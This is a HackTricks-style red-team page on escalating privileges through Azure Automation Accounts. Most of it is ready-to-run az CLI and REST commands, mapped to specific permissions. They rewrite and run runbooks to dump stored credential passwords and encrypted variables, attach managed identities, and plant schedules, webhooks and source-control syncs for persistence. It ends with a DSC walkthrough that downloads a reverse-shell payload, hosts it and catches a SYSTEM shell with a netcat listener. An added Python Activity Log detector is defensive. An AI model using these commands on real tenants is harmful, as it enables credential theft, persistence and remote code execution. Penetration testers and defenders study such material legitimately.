Az - Azure Automation Accounts Privesc
tip
Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
Azure Automation Accounts
For more information check:
Hybrid Workers Group
- From Automation Account to VM
Note that if an attacker can somehow execute an arbitrary runbook (arbitrary code) on a hybrid worker, they will be able to pivot into the VM's network location. This could be an on-premises machine, a VPC in a different cloud or even an Azure VM.
Moreover, if the hybrid worker runs in Azure and has other Managed Identities attached, the runbook will be able to access both the runbook's managed identity and all of the VM's managed identities through the metadata service.
tip
Note that the metadata service uses a different URL (http://169.254.169.254) than the service from which the automation account's managed identity tokens are obtained (IDENTITY_ENDPOINT).
- From VM to Automation Account
Moreover, if someone compromises a VM where an automation account script runs, they will be able to find the Automation Account's metadata and access it from the VM to obtain tokens for the Managed Identity attached to the Automation Account.
As shown in the following image, with Administrator access over the VM it's possible to find, in the environment variables of the process, the URL and the secrets needed to access the automation account's metadata service:
Microsoft.Automation/automationAccounts/jobs/write, Microsoft.Automation/automationAccounts/runbooks/draft/write, Microsoft.Automation/automationAccounts/jobs/output/read, Microsoft.Automation/automationAccounts/runbooks/publish/action (Microsoft.Resources/subscriptions/resourcegroups/read, Microsoft.Automation/automationAccounts/runbooks/write)
In summary, these permissions allow creating, modifying and running Runbooks in an Automation Account, which can be used to execute code in the context of the Automation Account, escalate privileges to the Managed Identity assigned to it, and leak the credentials and encrypted variables stored in the Automation Account.
The permission Microsoft.Automation/automationAccounts/runbooks/draft/write allows modifying the code of a Runbook in an Automation Account using:
# Update the runbook content with the provided PowerShell script
az automation runbook replace-content --no-wait \
--resource-group Resource_Group_1 \
--automation-account-name autoaccount1 \
--name AzureAutomationTutorialWithIdentity \
--content '$creds = Get-AutomationPSCredential -Name "<credential-name>"
$runbook_variable = Get-AutomationVariable -Name "<encrypted-variable-name>"
$runbook_variable
$creds.GetNetworkCredential().username
$creds.GetNetworkCredential().password'
Note how the previous script can be used to leak the username and password of a credential and the value of an encrypted variable stored in the Automation Account.
The permission Microsoft.Automation/automationAccounts/runbooks/publish/action allows the user to publish a Runbook in the Automation Account so the changes take effect:
az automation runbook publish \
--resource-group <res-group> \
--automation-account-name <account-name> \
--name <runbook-name>
The permission Microsoft.Automation/automationAccounts/jobs/write allows the user to run a Runbook in the Automation Account using:
az automation runbook start \
--automation-account-name <account-name> \
--resource-group <res-group> \
--name <runbook-name> \
[--run-on <name-hybrid-group>]
The permission Microsoft.Automation/automationAccounts/jobs/output/read allows the user to read the output of a job in the Automation Account using:
az rest --method GET \
--url "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<res-group>/providers/Microsoft.Automation/automationAccounts/<automation-account-name>/jobs/<job-name>/output?api-version=2023-11-01"
If there are no Runbooks yet, or you want to create a new one, you'll need the permissions Microsoft.Resources/subscriptions/resourcegroups/read and Microsoft.Automation/automationAccounts/runbooks/write to do so using:
az automation runbook create --automation-account-name <account-name> --resource-group <res-group> --name <runbook-name> --type PowerShell
Microsoft.Automation/automationAccounts/write, Microsoft.ManagedIdentity/userAssignedIdentities/assign/action
This permission allows the user to assign a user-assigned managed identity to the Automation Account using:
az rest --method PATCH \
--url "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<res-group>/providers/Microsoft.Automation/automationAccounts/<automation-account-name>?api-version=2020-01-13-preview" \
--headers "Content-Type=application/json" \
--body '{
"identity": {
"type": "UserAssigned",
"userAssignedIdentities": {
"/subscriptions/<subscription-id>/resourceGroups/<res-group>/providers/Microsoft.ManagedIdentity/userAssignedIdentities/<user-managed-identity-name>": {}
}
}
}'
Microsoft.Automation/automationAccounts/schedules/write, Microsoft.Automation/automationAccounts/jobSchedules/write
With the permission Microsoft.Automation/automationAccounts/schedules/write it's possible to create a new Schedule in the Automation Account that runs every 15 minutes (not very stealthy) using the following command.
Note that the minimum period for a schedule is 15 minutes, and the minimum start time is 5 minutes in the future.
## For Linux
az automation schedule create \
--resource-group <RESOURCE_GROUP> \
--automation-account-name <AUTOMATION_ACCOUNT_NAME> \
--name <SCHEDULE_NAME> \
--description "Triggers runbook every 15 minutes" \
--start-time "$(date -u -d "7 minutes" +%Y-%m-%dT%H:%M:%SZ)" \
--frequency Minute \
--interval 15
## For macOS
az automation schedule create \
--resource-group <RESOURCE_GROUP> \
--automation-account-name <AUTOMATION_ACCOUNT_NAME> \
--name <SCHEDULE_NAME> \
--description "Triggers runbook every 15 minutes" \
--start-time "$(date -u -v+7M +%Y-%m-%dT%H:%M:%SZ)" \
--frequency Minute \
--interval 15
Then, with the permission Microsoft.Automation/automationAccounts/jobSchedules/write it's possible to assign a Schedule to a runbook using:
az rest --method PUT \
--url "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<res-group>/providers/Microsoft.Automation/automationAccounts/<automation-accounts>/jobSchedules/b510808a-8fdc-4509-a115-12cfc3a2ad0d?api-version=2015-10-31" \
--headers "Content-Type=application/json" \
--body '{
"properties": {
"runOn": "",
"runbook": {
"name": "<runbook-name>"
},
"schedule": {
"name": "<scheduler-name>"
},
"parameters": {}
}
}'
tip
In the previous example the jobSchedule id was left as b510808a-8fdc-4509-a115-12cfc3a2ad0d as an example, but you'll need to use a random value to create this assignment.
Microsoft.Automation/automationAccounts/webhooks/write
With the permission Microsoft.Automation/automationAccounts/webhooks/write it's possible to create a new Webhook for a Runbook inside the Automation Account using the following command.
New-AzAutomationWebHook -Name <webhook-name> -ResourceGroupName <res-group> -AutomationAccountName <automation-account-name> -RunbookName <runbook-name> -IsEnabled $true
This command should return the webhook URI, which is only shown at creation time. Then, to invoke the runbook through the webhook URI:
curl -X POST "https://f931b47b-18c8-45a2-9d6d-0211545d8c02.webhook.eus.azure-automation.net/webhooks?token=Ts5WmbKk0zcuA8PEUD4pr%2f6SM0NWydiCDqCqS1IdzIU%3d" \
-H "Content-Length: 0"
Microsoft.Automation/automationAccounts/runbooks/draft/write
With only the permission Microsoft.Automation/automationAccounts/runbooks/draft/write it's possible to update the code of a Runbook without publishing it and run it using the following commands.
# Update the runbook content with the provided PowerShell script
az automation runbook replace-content --no-wait \
--resource-group Resource_Group_1 \
--automation-account-name autoaccount1 \
--name AzureAutomationTutorialWithIdentity \
--content 'echo "Hello World"'
# Run the unpublished code
## Indicate the name of the hybrid worker group in runOn to execute the runbook there
az rest \
--method PUT \
--url "https://management.azure.com/subscriptions/9291ff6e-6afb-430e-82a4-6f04b2d05c7f/resourceGroups/Resource_Group_1/providers/Microsoft.Automation/automationAccounts/autoaccount1/runbooks/AzureAutomationTutorialWithIdentity/draft/testJob?api-version=2023-05-15-preview" \
--headers "Content-Type=application/json" \
--body '{
"parameters": {},
"runOn": "",
"runtimeEnvironment": "PowerShell-5.1"
}'
# Get the output (a different permission is needed here, but you could get a reverse shell or exfiltrate the token to avoid needing this permission)
az rest --method get --url "https://management.azure.com/subscriptions/9291ff6e-6afb-430e-82a4-6f04b2d05c7f/resourceGroups/Resource_Group_1/providers/Microsoft.Automation/automationAccounts/autoaccount1/runbooks/AzureAutomationTutorialWithIdentity/draft/testJob/streams?api-version=2019-06-01"
Microsoft.Automation/automationAccounts/sourceControls/write, (Microsoft.Automation/automationAccounts/sourceControls/read)
This permission allows the user to create a source control for the Automation Account using a command like the following (this uses GitHub as an example):
az automation source-control create \
--resource-group <res-group> \
--automation-account-name <automation-account-name> \
--name RemoteGithub \
--repo-url https://github.com/carlospolop/gh-runbooks.git \
--branch main \
--folder-path /runbooks/ \
--publish-runbook true \
--auto-sync \
--source-type GitHub \
--token-type PersonalAccessToken \
--access-token github_pat_11AEDCVZ<rest-of-the-token>
This will automatically import the runbooks from the GitHub repository into the Automation Account, and combined with other permissions to start running them it would be possible to escalate privileges.
Moreover, note that for source control to work in Automation Accounts the account must have a managed identity with the Contributor role, and if it's a user-assigned managed identity, the client id of the MI must be specified in the variable AUTOMATION_SC_USER_ASSIGNED_IDENTITY_ID.
tip
Note that it's not possible to change the repo URL of a source control once it has been created.
Microsoft.Automation/automationAccounts/variables/write
With the permission Microsoft.Automation/automationAccounts/variables/write it's possible to write variables in the Automation Account using the following command.
az rest --method PUT \
--url "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<res-group>/providers/Microsoft.Automation/automationAccounts/<automation-account-name>/variables/<variable-name>?api-version=2019-06-01" \
--headers "Content-Type=application/json" \
--body '{
"name": "<variable-name>",
"properties": {
"description": "",
"value": "\"<variable-value>\"",
"isEncrypted": false
}
}'
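On the defensive side, every operation named in the permission sections above is recorded in the Azure Activity Log. The following added example (not from HackTricks or Microsoft) correlates those records into the modify -> publish -> run chain from the runbook section and flags the standalone webhooks/write, sourceControls/write and jobSchedules/write persistence paths from the later sections; the records, callers (contoso.example), resource group rg1 and account acct1 are constructed and only mimic the shape of `az monitor activity-log list -o json` output.

```python
"""Correlate Azure Activity Log records into Automation Account runbook-abuse findings.
Added example, not from the page. Records are constructed, shaped like
`az monitor activity-log list -o json` output; adapt field names to your export."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

P = "Microsoft.Automation/automationAccounts/"
# Operations from the page that together let a caller plant code and run it.
STAGE_OPS = {P + "runbooks/draft/write": "modify", P + "runbooks/write": "modify",
             P + "runbooks/publish/action": "publish", P + "jobs/write": "run"}
# Operations that create a standing execution path by themselves.
STANDALONE_OPS = {P + "webhooks/write", P + "sourceControls/write", P + "jobSchedules/write"}
ACCOUNT_RE = re.compile(r"^(.*?/automationAccounts/[^/]+)", re.IGNORECASE)


def find_runbook_abuse(events, window=timedelta(minutes=30)):
    """Return (caller, account_id, kind); 'chain' = modify -> publish -> run within window."""
    findings, staged = [], defaultdict(list)
    for e in events:
        if e.get("status", {}).get("value") != "Succeeded":
            continue  # failed attempts deserve a separate alert
        op = e["operationName"]["value"]
        key = (e["caller"], ACCOUNT_RE.match(e["resourceId"]).group(1))
        if op in STANDALONE_OPS:
            findings.append((*key, "standalone:" + op.rsplit("/", 2)[-2]))
        elif op in STAGE_OPS:
            t = datetime.strptime(e["eventTimestamp"][:19], "%Y-%m-%dT%H:%M:%S")
            staged[key].append((t, STAGE_OPS[op]))
    for key, evs in staged.items():
        mod = pub = None  # walk in time order: a publish only counts after a modify
        for t, stage in sorted(evs):
            if stage == "modify":
                mod, pub = t, None
            elif stage == "publish" and mod is not None:
                pub = t
            elif stage == "run" and pub is not None and t - mod <= window:
                findings.append((*key, "chain"))
                break
    return findings


def _ev(ts, caller, op, child):
    # One constructed Activity Log record (sample data, not from a real tenant).
    return {"eventTimestamp": ts, "caller": caller, "status": {"value": "Succeeded"},
            "operationName": {"value": op}, "resourceId": "/subscriptions/<sub-id>/"
            "resourceGroups/rg1/providers/" + P + "acct1" + child}

SAMPLE_EVENTS = [  # constructed: one full chain by dev@ plus a webhook write by svc@
    _ev("2024-05-01T10:00:00Z", "dev@contoso.example", P + "runbooks/draft/write", "/runbooks/rb1"),
    _ev("2024-05-01T10:02:00Z", "dev@contoso.example", P + "runbooks/publish/action", "/runbooks/rb1"),
    _ev("2024-05-01T10:03:00Z", "dev@contoso.example", P + "jobs/write", "/jobs/4f2c"),
    _ev("2024-05-01T11:00:00Z", "svc@contoso.example", P + "webhooks/write", "/webhooks/wh1"),
]
```

A publish or job start without a preceding draft/runbook write in the window is not reported, so legitimate deployments by a separate pipeline identity stay quiet while a single principal doing all three steps is surfaced.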
Custom Runtime Environments
If the automation account uses custom runtime environments, it might be possible to modify a custom package of those environments with malicious code (like a backdoor). This way, every time a runbook that uses that custom environment is executed and loads the custom package, the malicious code will run.
Compromise State Configuration
Check the full post at: https://medium.com/cepheisecurity/abusing-azure-dsc-remote-code-execution-and-privilege-escalation-ab8c35dd04fe
- Step 1 — Create Files
Required files: two PowerShell scripts are needed:
reverse_shell_config.ps1: the Desired State Configuration (DSC) file that fetches and executes the payload. Available from GitHub.
push_reverse_shell_config.ps1: the script that publishes the configuration to the VM, available on GitHub.
Modification: the variables and parameters in these files must be changed to fit the user's specific environment, including resource names, file paths, and server/payload identifiers.
- Step 2 — Zip the Configuration File
The reverse_shell_config.ps1 file is compressed into a .zip file, making it ready for upload to an Azure Storage Account.
Compress-Archive -Path .\reverse_shell_config.ps1 -DestinationPath .\reverse_shell_config.ps1.zip
- Step 3 — Set Storage Context & Upload
The zipped configuration file is uploaded to a pre-created Azure Storage container, azure-pentest, using the Azure cmdlet Set-AzStorageBlobContent.
Set-AzStorageBlobContent -File "reverse_shell_config.ps1.zip" -Container "azure-pentest" -Blob "reverse_shell_config.ps1.zip" -Context $ctx
- Step 4 — Prep Kali Box
The Kali server downloads the RevPS.ps1 payload from the GitHub repository.
wget https://raw.githubusercontent.com/nickpupp0/AzureDSCAbuse/master/RevPS.ps1
The script is edited to specify the target Windows VM and the reverse shell port.
- Step 5 — Publish the Configuration File
The configuration file is executed, causing the reverse shell script to be pushed to the specified location on the Windows VM.
- Step 6 — Host Payload and Set Up Listener
A Python SimpleHTTPServer is started to host the payload, along with a Netcat listener to catch the incoming connection.
sudo python -m SimpleHTTPServer 80
sudo nc -nlvp 443
The scheduled task executes the payload, gaining SYSTEM-level privileges.